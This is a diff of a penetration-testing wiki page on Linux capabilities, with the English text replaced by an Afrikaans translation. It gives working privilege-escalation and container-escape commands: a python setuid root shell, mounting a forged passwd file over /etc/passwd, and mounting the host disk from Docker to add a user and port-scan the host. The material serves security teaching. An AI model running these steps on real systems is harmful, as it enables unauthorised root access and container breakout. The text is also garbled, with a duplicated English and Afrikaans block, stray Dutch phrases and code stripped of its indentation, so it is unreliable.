capability from the permitted set to its effective set, giving it the ability to use that capability. It can also drop capabilities from its permitted set. - - **Boundary**: It acts as an upper limit for the capabilities a process can have, ensuring a process doesn't exceed its predefined privilege scope. +3. **Toegelaat (CapPrm)**: +- **Doel**: Definieer die maksimum stel vermoëns wat 'n proses kan besit. 
+- **Funksionaliteit**: 'n Proses kan 'n vermoë van die toegelate stel na sy effektiewe stel verhoog, wat hom die vermoë gee om daardie vermoë te gebruik. Dit kan ook vermoëns uit sy toegelate stel verwyder. +- **Grens**: Dit tree op as 'n boonste grens vir die vermoëns wat 'n proses kan hê, en verseker dat 'n proses nie sy voorafbepaalde voorregomvang oorskry nie. -4. **Bounding (CapBnd)**: - - **Purpose**: Puts a ceiling on the capabilities a process can ever acquire during its lifecycle. - - **Functionality**: Even if a process has a certain capability in its inheritable or permitted set, it cannot acquire that capability unless it's also in the bounding set. - - **Use-case**: This set is particularly useful for restricting a process's privilege escalation potential, adding an extra layer of security. - -5. **Ambient (CapAmb)**: - - **Purpose**: Allows certain capabilities to be maintained across an `execve` system call, which typically would result in a full reset of the process's capabilities. - - **Functionality**: Ensures that non-SUID programs that don't have associated file capabilities can retain certain privileges. - - **Restrictions**: Capabilities in this set are subject to the constraints of the inheritable and permitted sets, ensuring they don't exceed the process's allowed privileges. +4. **Begrens (CapBnd)**: +- **Doel**: Stel 'n plafon op die vermoëns wat 'n proses gedurende sy lewensiklus kan bekom. +- **Funksionaliteit**: Selfs as 'n proses 'n sekere vermoë in sy oorerfbare of toegelate stel het, kan dit nie daardie vermoë bekom tensy dit ook in die begrensingsstel is nie. +- **Gebruiksscenario**: Hierdie stel is veral nuttig om 'n proses se potensiaal vir voorregverhoging te beperk en 'n ekstra laag sekuriteit toe te voeg. +5. **Omringend (CapAmb)**: +- **Doel**: Maak dit moontlik dat sekere vermoëns behoue bly tydens 'n `execve`-sisteemaanroep, wat normaalweg sou lei tot 'n volledige herstel van die proses se vermoëns. 
+- **Funksionaliteit**: Verseker dat nie-SUID-programme wat nie geassosieerde lêervermoëns het nie, sekere voorregte kan behou. +- **Beperkings**: Vermoëns in hierdie stel is onderhewig aan die beperkings van die oorerfbare en toegelate stelle, om te verseker dat hulle nie die proses se toegelate voorregte oorskry nie. ```python # Code to demonstrate the interaction of different capability sets might look like this: # Note: This is pseudo-code for illustrative purposes only. def manage_capabilities(process): - if process.has_capability('cap_setpcap'): - process.add_capability_to_set('CapPrm', 'new_capability') - process.limit_capabilities('CapBnd') - process.preserve_capabilities_across_execve('CapAmb') +if process.has_capability('cap_setpcap'): +process.add_capability_to_set('CapPrm', 'new_capability') +process.limit_capabilities('CapBnd') +process.preserve_capabilities_across_execve('CapAmb') ``` - -For further information check: +Vir verdere inligting, kyk na: * [https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work](https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work) * [https://blog.ploetzli.ch/2014/understanding-linux-capabilities/](https://blog.ploetzli.ch/2014/understanding-linux-capabilities/) -## Processes & Binaries Capabilities +## Prosesse & Binêre Kapasiteite -### Processes Capabilities +### Prosesse Kapasiteite -To see the capabilities for a particular process, use the **status** file in the /proc directory. As it provides more details, let’s limit it only to the information related to Linux capabilities.\ -Note that for all running processes capability information is maintained per thread, for binaries in the file system it’s stored in extended attributes. +Om die kapasiteite vir 'n spesifieke proses te sien, gebruik die **status** lêer in die /proc gids. 
Aangesien dit meer besonderhede verskaf, beperk ons dit slegs tot die inligting wat verband hou met Linux kapasiteite.\ +Let daarop dat vir alle lopende prosesse kapasiteitinligting per draad onderhou word, en vir binêre lêers in die lêersisteem word dit in uitgebreide eienskappe gestoor. -You can find the capabilities defined in /usr/include/linux/capability.h - -You can find the capabilities of the current process in `cat /proc/self/status` or doing `capsh --print` and of other users in `/proc//status` +Jy kan die kapasiteite wat in /usr/include/linux/capability.h gedefinieer is, vind. +Jy kan die kapasiteite van die huidige proses vind in `cat /proc/self/status` of deur `capsh --print` te doen, en van ander gebruikers in `/proc//status`. ```bash cat /proc/1234/status | grep Cap cat /proc/$$/status | grep Cap #This will print the capabilities of the current process ``` +Hierdie bevel moet 5 lyne op die meeste stelsels teruggee. -This command should return 5 lines on most systems. - -* CapInh = Inherited capabilities -* CapPrm = Permitted capabilities -* CapEff = Effective capabilities -* CapBnd = Bounding set -* CapAmb = Ambient capabilities set - +* CapInh = Geërfde vermoëns +* CapPrm = Toegelate vermoëns +* CapEff = Effektiewe vermoëns +* CapBnd = Grensstellings +* CapAmb = Omgewingsvermoëns stel ```bash #These are the typical capabilities of a root owned process (all) CapInh: 0000000000000000 
@@ -101,16 +96,12 @@ CapEff: 0000003fffffffff CapBnd: 0000003fffffffff CapAmb: 0000000000000000 ``` - -These hexadecimal numbers don’t make sense. Using the capsh utility we can decode them into the capabilities name. - +Hierdie heksadesimale getalle maak nie sin nie. Deur die capsh-hulpprogram te gebruik, kan ons hulle ontsleutel na die naam van die vermoëns. ```bash capsh --decode=0000003fffffffff 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37 ``` - -Lets check now the **capabilities** used by `ping`: - +Laten ons nou die **vermoëns** wat deur `ping` gebruik word, nagaan: ```bash cat /proc/9491/status | grep Cap CapInh: 0000000000000000 
@@ -122,15 +113,11 @@ CapAmb: 0000000000000000 capsh --decode=0000000000003000 0x0000000000003000=cap_net_admin,cap_net_raw ``` - -Although that works, there is another and easier way. To see the capabilities of a running process, simply use the **getpcaps** tool followed by its process ID (PID). You can also provide a list of process IDs. - +Alhoewel dit werk, is daar 'n ander en makliker manier. Om die vermoëns van 'n lopende proses te sien, gebruik eenvoudig die **getpcaps**-instrument gevolg deur sy proses-ID (PID). Jy kan ook 'n lys van proses-ID's voorsien. ```bash getpcaps 1234 ``` - -Lets check here the capabilities of `tcpdump` after having giving the binary enough capabilities (`cap_net_admin` and `cap_net_raw`) to sniff the network (_tcpdump is running in process 9562_): - +Laten ons hier die vermoëns van `tcpdump` nagaan nadat die binêre lêer genoeg vermoëns (`cap_net_admin` en `cap_net_raw`) gekry het om die netwerk te bespeur (_tcpdump word uitgevoer in proses 9562_): ```bash #The following command give tcpdump the needed capabilities to sniff traffic $ setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump 
@@ -148,53 +135,42 @@ CapAmb: 0000000000000000 $ capsh --decode=0000000000003000 0x0000000000003000=cap_net_admin,cap_net_raw ``` +Soos u kan sien, stem die gegee bevoegdhede ooreen met die resultate van die 2 maniere om die bevoegdhede van 'n binêre lêer te bekom. Die _getpcaps_ hulpmiddel gebruik die **capget()** stelseloproep om die beskikbare bevoegdhede vir 'n spesifieke draad te ondersoek. Hierdie stelseloproep hoef slegs die PID te voorsien om meer inligting te verkry. -As you can see the given capabilities corresponds with the results of the 2 ways of getting the capabilities of a binary.\ -The _getpcaps_ tool uses the **capget()** system call to query the available capabilities for a particular thread. This system call only needs to provide the PID to obtain more information. - -### Binaries Capabilities - -Binaries can have capabilities that can be used while executing. For example, it's very common to find `ping` binary with `cap_net_raw` capability: +### Binêre Bevoegdhede +Binêre lêers kan bevoegdhede hê wat tydens uitvoering gebruik kan word. Byvoorbeeld, dit is baie algemeen om die `ping` binêre lêer met die `cap_net_raw` bevoegdheid te vind: ```bash getcap /usr/bin/ping /usr/bin/ping = cap_net_raw+ep ``` - -You can **search binaries with capabilities** using: - +Jy kan **binêre lêers met vermoëns soek** deur die volgende te gebruik: ```bash getcap -r / 2>/dev/null ``` +### Laat kapasiteite val met capsh -### Dropping capabilities with capsh - -If we drop the CAP\_NET\_RAW capabilities for _ping_, then the ping utility should no longer work. - +As ons die CAP\_NET\_RAW kapasiteite laat val vir _ping_, behoort die ping nut nie meer te werk nie. ```bash capsh --drop=cap_net_raw --print -- -c "tcpdump" ``` +Behalwe die uitset van _capsh_ self, moet die _tcpdump_ bevel self ook 'n fout veroorsaak. -Besides the output of _capsh_ itself, the _tcpdump_ command itself should also raise an error. 
+> /bin/bash: /usr/sbin/tcpdump: Operasie nie toegelaat nie -> /bin/bash: /usr/sbin/tcpdump: Operation not permitted +Die fout wys duidelik dat die ping bevel nie toegelaat word om 'n ICMP sokket oop te maak nie. Nou weet ons verseker dat dit soos verwag werk. -The error clearly shows that the ping command is not allowed to open an ICMP socket. Now we know for sure that this works as expected. - -### Remove Capabilities - -You can remove capabilities of a binary with +### Verwyder Bekwaamhede +Jy kan bekwaamhede van 'n binêre lêer verwyder met ```bash setcap -r ``` +## Gebruikerseienaarskappe -## User Capabilities - -Apparently **it's possible to assign capabilities also to users**. This probably means that every process executed by the user will be able to use the users capabilities.\ -Base on on [this](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [this ](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html)and [this ](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user)a few files new to be configured to give a user certain capabilities but the one assigning the capabilities to each user will be `/etc/security/capability.conf`.\ -File example: - +Blykbaar is dit ook moontlik om eienaarskappe aan gebruikers toe te ken. Dit beteken waarskynlik dat elke proses wat deur die gebruiker uitgevoer word, die gebruikers se eienaarskappe kan gebruik. 
+Gebaseer op [hierdie](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [hierdie](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html) en [hierdie](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user) moet 'n paar nuwe lêers gekonfigureer word om 'n gebruiker sekere eienaarskappe te gee, maar die een wat die eienaarskappe aan elke gebruiker toeken, sal `/etc/security/capability.conf` wees. +Lêer voorbeeld: ```bash # Simple cap_sys_ptrace developer @@ -208,25 +184,24 @@ cap_net_admin,cap_net_raw jrnetadmin # Combining names and numerics cap_sys_admin,22,25 jrsysadmin ``` +## Omgewingsvermoëns -## Environment Capabilities - -Compiling the following program it's possible to **spawn a bash shell inside an environment that provides capabilities**. +Deur die volgende program te kompileer, is dit moontlik om **'n bash-skulp te skep binne 'n omgewing wat vermoëns bied**. {% code title="ambient.c" %} ```c /* - * Test program for the ambient capabilities - * - * compile using: - * gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c - * Set effective, inherited and permitted capabilities to the compiled binary - * sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient - * - * To get a shell with additional caps that can be inherited do: - * - * ./ambient /bin/bash - */ +* Test program for the ambient capabilities +* +* compile using: +* gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c +* Set effective, inherited and permitted capabilities to the compiled binary +* sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient +* +* To get a shell with additional caps that can be inherited do: +* +* ./ambient /bin/bash +*/ #include #include 
@@ -237,114 +212,107 @@ Compiling the following program it's possible to **spawn a bash shell inside an #include static void set_ambient_cap(int cap) { - int rc; - capng_get_caps_process(); - rc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap); - if (rc) { - printf("Cannot add inheritable cap\n"); - exit(2); - } - capng_apply(CAPNG_SELECT_CAPS); - /* Note the two 0s at the end. Kernel checks for these */ - if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) { - perror("Cannot set cap"); - exit(1); - } +int rc; +capng_get_caps_process(); +rc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap); +if (rc) { +printf("Cannot add inheritable cap\n"); +exit(2); +} +capng_apply(CAPNG_SELECT_CAPS); +/* Note the two 0s at the end. Kernel checks for these */ +if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) { +perror("Cannot set cap"); +exit(1); +} } void usage(const char * me) { - printf("Usage: %s [-c caps] new-program new-args\n", me); - exit(1); +printf("Usage: %s [-c caps] new-program new-args\n", me); +exit(1); } int default_caplist[] = { - CAP_NET_RAW, - CAP_NET_ADMIN, - CAP_SYS_NICE, - -1 +CAP_NET_RAW, +CAP_NET_ADMIN, +CAP_SYS_NICE, +-1 }; int * get_caplist(const char * arg) { - int i = 1; - int * list = NULL; - char * dup = strdup(arg), * tok; - for (tok = strtok(dup, ","); tok; tok = strtok(NULL, ",")) { - list = realloc(list, (i + 1) * sizeof(int)); - if (!list) { - perror("out of memory"); - exit(1); - } - list[i - 1] = atoi(tok); - list[i] = -1; - i++; - } - return list; +int i = 1; +int * list = NULL; +char * dup = strdup(arg), * tok; +for (tok = strtok(dup, ","); tok; tok = strtok(NULL, ",")) { +list = realloc(list, (i + 1) * sizeof(int)); +if (!list) { +perror("out of memory"); +exit(1); +} +list[i - 1] = atoi(tok); +list[i] = -1; +i++; +} +return list; } int main(int argc, char ** argv) { - int rc, i, gotcaps = 0; - int * caplist = NULL; - int index = 1; // argv index for cmd to start - if (argc < 2) - usage(argv[0]); - if (strcmp(argv[1], 
"-c") == 0) { - if (argc <= 3) { - usage(argv[0]); - } - caplist = get_caplist(argv[2]); - index = 3; - } - if (!caplist) { - caplist = (int * ) default_caplist; - } - for (i = 0; caplist[i] != -1; i++) { - printf("adding %d to ambient list\n", caplist[i]); - set_ambient_cap(caplist[i]); - } - printf("Ambient forking shell\n"); - if (execv(argv[index], argv + index)) - perror("Cannot exec"); - return 0; +int rc, i, gotcaps = 0; +int * caplist = NULL; +int index = 1; // argv index for cmd to start +if (argc < 2) +usage(argv[0]); +if (strcmp(argv[1], "-c") == 0) { +if (argc <= 3) { +usage(argv[0]); +} +caplist = get_caplist(argv[2]); +index = 3; +} +if (!caplist) { +caplist = (int * ) default_caplist; +} +for (i = 0; caplist[i] != -1; i++) { +printf("adding %d to ambient list\n", caplist[i]); +set_ambient_cap(caplist[i]); +} +printf("Ambient forking shell\n"); +if (execv(argv[index], argv + index)) +perror("Cannot exec"); +return 0; } ``` {% endcode %} - ```bash gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient ./ambient /bin/bash ``` - -Inside the **bash executed by the compiled ambient binary** it's possible to observe the **new capabilities** (a regular user won't have any capability in the "current" section). - +Binne die **bash wat uitgevoer word deur die saamgestelde omgewingsbinêre**, is dit moontlik om die **nuwe vermoëns** waar te neem ( 'n gewone gebruiker sal geen vermoë in die "huidige" afdeling hê nie). ```bash capsh --print Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip ``` - {% hint style="danger" %} -You can **only add capabilities that are present** in both the permitted and the inheritable sets. +Jy kan **slegs vermoëns byvoeg wat teenwoordig is** in beide die toegelate en die oorerflike stelle. 
{% endhint %} -### Capability-aware/Capability-dumb binaries +### Vermoënsbewuste/vermoënsdomme bineêre lêers -The **capability-aware binaries won't use the new capabilities** given by the environment, however the **capability dumb binaries will us**e them as they won't reject them. This makes capability-dumb binaries vulnerable inside a special environment that grant capabilities to binaries. +Die **vermoënsbewuste bineêre lêers sal nie die nuwe vermoëns** wat deur die omgewing gegee word, gebruik nie, terwyl die **vermoënsdomme bineêre lêers** dit sal gebruik omdat hulle dit nie sal verwerp nie. Dit maak vermoënsdomme bineêre lêers kwesbaar binne 'n spesiale omgewing wat vermoëns aan bineêre lêers toeken. -## Service Capabilities - -By default a **service running as root will have assigned all the capabilities**, and in some occasions this may be dangerous.\ -Therefore, a **service configuration** file allows to **specify** the **capabilities** you want it to have, **and** the **user** that should execute the service to avoid running a service with unnecessary privileges: +## Diensvermoëns +Standaard sal 'n **diens wat as root uitgevoer word, alle vermoëns toegewys kry**, en in sommige gevalle kan dit gevaarlik wees.\ +Daarom maak 'n **dienskonfigurasie**-lêer dit moontlik om die **vermoëns** wat jy wil hê dat dit moet hê, **en** die **gebruiker** wat die diens moet uitvoer, te **spesifiseer** om te voorkom dat 'n diens met onnodige bevoegdhede uitgevoer word: ```bash [Service] User=bob AmbientCapabilities=CAP_NET_BIND_SERVICE ``` +## Bevoegdhede in Docker-houers -## Capabilities in Docker Containers - -By default Docker assigns a few capabilities to the containers. It's very easy to check which capabilities are these by running: - +Standaard ken Docker 'n paar bevoegdhede toe aan die houers. 
Dit is baie maklik om te kontroleer watter bevoegdhede dit is deur die volgende uit te voer: ```bash docker run --rm -it r.j3ss.co/amicontained bash Capabilities: - BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap +BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap # Add a capabilities docker run --rm -it --cap-add=SYS_ADMIN r.j3ss.co/amicontained bash @@ -355,21 +323,17 @@ docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash # Remove all and add only one docker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash ``` - -​ -
-​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteitsgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %} ## Privesc/Container Escape -Capabilities are useful when you **want to restrict your own processes after performing privileged operations** (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root. - -You can force capabilities upon programs using `setcap`, and query these using `getcap`: +Vermoëns is nuttig wanneer jy **jou eie prosesse wil beperk na die uitvoering van bevoorregte operasies** (bv. na die opstel van chroot en bind aan 'n sokket). Dit kan egter uitgebuit word deur kwaadwillige opdragte of argumente wat dan as root uitgevoer word. +Jy kan vermoëns afdwing op programme deur gebruik te maak van `setcap`, en dit ondersoek deur gebruik te maak van `getcap`: ```bash #Set Capability setcap cap_net_raw+ep /sbin/ping 
@@ -378,19 +342,15 @@ setcap cap_net_raw+ep /sbin/ping getcap /sbin/ping /sbin/ping = cap_net_raw+ep ``` +Die `+ep` beteken dat jy die vermoë byvoeg ("-" sal dit verwyder) as Effektief en Toegelaat. -The `+ep` means you’re adding the capability (“-” would remove it) as Effective and Permitted. - -To identify programs in a system or folder with capabilities: - +Om programme in 'n stelsel of vouer met vermoëns te identifiseer: ```bash getcap -r / 2>/dev/null ``` +### Uitbuiting voorbeeld -### Exploitation example - -In the following example the binary `/usr/bin/python2.6` is found vulnerable to privesc: - +In die volgende voorbeeld word gevind dat die binêre lêer `/usr/bin/python2.6` vatbaar is vir bevoorregte eskalasie: ```bash setcap cap_setuid+ep /usr/bin/python2.7 /usr/bin/python2.7 = cap_setuid+ep 
@@ -398,46 +358,65 @@ setcap cap_setuid+ep /usr/bin/python2.7 #Exploit /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");' ``` +**Vermoëns** wat deur `tcpdump` benodig word om **enige gebruiker in staat te stel om pakkies te onderskep**: -**Capabilities** needed by `tcpdump` to **allow any user to sniff packets**: +```markdown +To allow any user to sniff packets, the `tcpdump` binary needs the following capabilities: +1. `CAP_NET_RAW`: This capability allows the binary to create raw sockets, which are necessary for packet sniffing. + +To grant these capabilities to the `tcpdump` binary, you can use the `setcap` command as follows: + +```bash +sudo setcap cap_net_raw=eip /usr/sbin/tcpdump +``` + +After setting the capabilities, any user will be able to run `tcpdump` and sniff packets without requiring root privileges. +``` +```afrikaans +Om enige gebruiker in staat te stel om pakkies te onderskep, benodig die `tcpdump` binêre lêer die volgende vermoëns: + +1. `CAP_NET_RAW`: Hierdie vermoë stel die binêre lêer in staat om rou sokkels te skep, wat nodig is vir pakkie-onderskepping. + +Om hierdie vermoëns aan die `tcpdump` binêre lêer toe te ken, kan jy die `setcap` opdrag soos volg gebruik: + +```bash +sudo setcap cap_net_raw=eip /usr/sbin/tcpdump +``` + +Nadat die vermoëns ingestel is, sal enige gebruiker in staat wees om `tcpdump` uit te voer en pakkies te onderskep sonder om root-voorregte te vereis. 
+``` ```bash setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump getcap /usr/sbin/tcpdump /usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip ``` +### Die spesiale geval van "leë" vermoëns -### The special case of "empty" capabilities +[Van die dokumentasie](https://man7.org/linux/man-pages/man7/capabilities.7.html): Let daarop dat 'n mens leë vermoëstelle aan 'n programlêer kan toewys, en dit is dus moontlik om 'n stel-gebruiker-ID-root-program te skep wat die effektiewe en gestoorde gebruiker-ID van die proses wat die program uitvoer, na 0 verander, maar geen vermoëns aan daardie proses verleen nie. Of, eenvoudig gestel, as jy 'n binêre lêer het wat: -[From the docs](https://man7.org/linux/man-pages/man7/capabilities.7.html): Note that one can assign empty capability sets to a program file, and thus it is possible to create a set-user-ID-root program that changes the effective and saved set-user-ID of the process that executes the program to 0, but confers no capabilities to that process. Or, simply put, if you have a binary that: +1. nie deur root besit word nie +2. geen `SUID`/`SGID`-bits ingestel het nie +3. leë vermoënsstel het (bv.: `getcap myelf` gee `myelf =ep` terug) -1. is not owned by root -2. has no `SUID`/`SGID` bits set -3. has empty capabilities set (e.g.: `getcap myelf` returns `myelf =ep`) - -then **that binary will run as root**. +sal **daardie binêre lêer as root uitgevoer word**. ## CAP\_SYS\_ADMIN -**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** is a highly potent Linux capability, often equated to a near-root level due to its extensive **administrative privileges**, such as mounting devices or manipulating kernel features. While indispensable for containers simulating entire systems, **`CAP_SYS_ADMIN` poses significant security challenges**, especially in containerized environments, due to its potential for privilege escalation and system compromise. 
Therefore, its usage warrants stringent security assessments and cautious management, with a strong preference for dropping this capability in application-specific containers to adhere to the **principle of least privilege** and minimize the attack surface. - -**Example with binary** +**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** is 'n hoogs kragtige Linux-vermoë, dikwels gelykgestel aan 'n bykans-rootvlak as gevolg van sy uitgebreide **administratiewe voorregte**, soos die koppel van toestelle of die manipulasie van kernelkenmerke. Terwyl dit onontbeerlik is vir houers wat hele stelsels simuleer, stel **`CAP_SYS_ADMIN` beduidende sekuriteitsuitdagings** in, veral in gehouerde omgewings, as gevolg van sy potensiaal vir voorregverhoging en stelselkompromie. Daarom vereis die gebruik daarvan streng sekuriteitsassesserings en versigtige bestuur, met 'n sterk voorkeur om hierdie vermoë in toepassingsspesifieke houers te laat val om aan die **beginsel van die minste voorreg** te voldoen en die aanvalsvlak te verminder. +**Voorbeeld met binêre lêer** ```bash getcap -r / 2>/dev/null /usr/bin/python2.7 = cap_sys_admin+ep ``` - -Using python you can mount a modified _passwd_ file on top of the real _passwd_ file: - +Met behulp van Python kan jy 'n gewysigde _passwd_ lêer bo-op die werklike _passwd_ lêer monteer: ```bash cp /etc/passwd ./ #Create a copy of the passwd file openssl passwd -1 -salt abc password #Get hash of "password" vim ./passwd #Change roots passwords of the fake passwd file ``` - -And finally **mount** the modified `passwd` file on `/etc/passwd`: - +En uiteindelik **monteer** die gewysigde `passwd`-lêer op `/etc/passwd`: ```python from ctypes import * libc = CDLL("libc.so.6") 
@@ -450,32 +429,28 @@ options = b"rw" mountflags = MS_BIND libc.mount(source, target, filesystemtype, mountflags, options) ``` +En jy sal in staat wees om **`su` as root** te gebruik met die wagwoord "password". -And you will be able to **`su` as root** using password "password". - -**Example with environment (Docker breakout)** - -You can check the enabled capabilities inside the docker container using: +**Voorbeeld met omgewing (Docker-ontsnapping)** +Jy kan die geaktiveerde vermoëns binne die Docker-houer nagaan deur die volgende te gebruik: ``` capsh --print Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) ``` +Binne die vorige uitset kan jy sien dat die 
SYS\_ADMIN-vermoë geaktiveer is. -Inside the previous output you can see that the SYS\_ADMIN capability is enabled. - -* **Mount** - -This allows the docker container to **mount the host disk and access it freely**: +* **Monteer** +Dit stel die docker-houer in staat om **die gasheer se skyf te monteer en vrylik daarop toegang te verkry**: ```bash fdisk -l #Get disk name Disk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors @@ -487,12 +462,10 @@ mount /dev/sda /mnt/ #Mount it cd /mnt chroot ./ bash #You have a shell inside the docker hosts disk ``` +* **Volledige toegang** -* **Full access** - -In the previous method we managed to access the docker host disk.\ -In case you find that the host is running an **ssh** server, you could **create a user inside the docker host** disk and access it via SSH: - +In die vorige metode het ons daarin geslaag om toegang tot die docker-gashouer se skyf te verkry.\ +In die geval waar jy vind dat die gashouer 'n **ssh**-bediener hardloop, kan jy 'n gebruiker **binne die docker-gashouer se skyf skep** en toegang daartoe verkry via SSH: ```bash #Like in the example before, the first step is to mount the docker host disk fdisk -l 
@@ -506,15 +479,13 @@ nc -v -n -w2 -z 172.17.0.1 1-65535 chroot /mnt/ adduser john ssh john@172.17.0.1 -p 2222 ``` - ## CAP\_SYS\_PTRACE -**This means that you can escape the container by injecting a shellcode inside some process running inside the host.** To access processes running inside the host the container needs to be run at least with **`--pid=host`**. +**Dit beteken dat jy die houer kan ontsnap deur 'n shellcode in te spuit in 'n proses wat binne die gasheer loop.** Om toegang te verkry tot prosesse wat binne die gasheer loop, moet die houer ten minste met **`--pid=host`** uitgevoer word. -**[`CAP_SYS_PTRACE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** grants the ability to use debugging and system call tracing functionalities provided by `ptrace(2)` and cross-memory attach calls like `process_vm_readv(2)` and `process_vm_writev(2)`. Although powerful for diagnostic and monitoring purposes, if `CAP_SYS_PTRACE` is enabled without restrictive measures like a seccomp filter on `ptrace(2)`, it can significantly undermine system security. Specifically, it can be exploited to circumvent other security restrictions, notably those imposed by seccomp, as demonstrated by [proofs of concept (PoC) like this one](https://gist.github.com/thejh/8346f47e359adecd1d53). - -**Example with binary (python)** +**[`CAP_SYS_PTRACE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** verleen die vermoë om die foutopsporing en stelseloproep-trasseringfunksies wat deur `ptrace(2)` en kruis-geheue-aanhegtingsoproepe soos `process_vm_readv(2)` en `process_vm_writev(2)` verskaf word, te gebruik. Alhoewel dit kragtig is vir diagnostiese en moniteringsdoeleindes, kan dit as `CAP_SYS_PTRACE` geaktiveer is sonder beperkende maatreëls soos 'n seccomp-filter op `ptrace(2)`, die stelselsekuriteit aansienlik ondermyn. 
Dit kan spesifiek uitgebuit word om ander sekuriteitsbeperkings te omseil, veral dié wat deur seccomp opgelê word, soos gedemonstreer deur [bewys van konsepte (PoC) soos hierdie een](https://gist.github.com/thejh/8346f47e359adecd1d53). +**Voorbeeld met binêre (python)** ```bash getcap -r / 2>/dev/null /usr/bin/python2.7 = cap_sys_ptrace+ep 
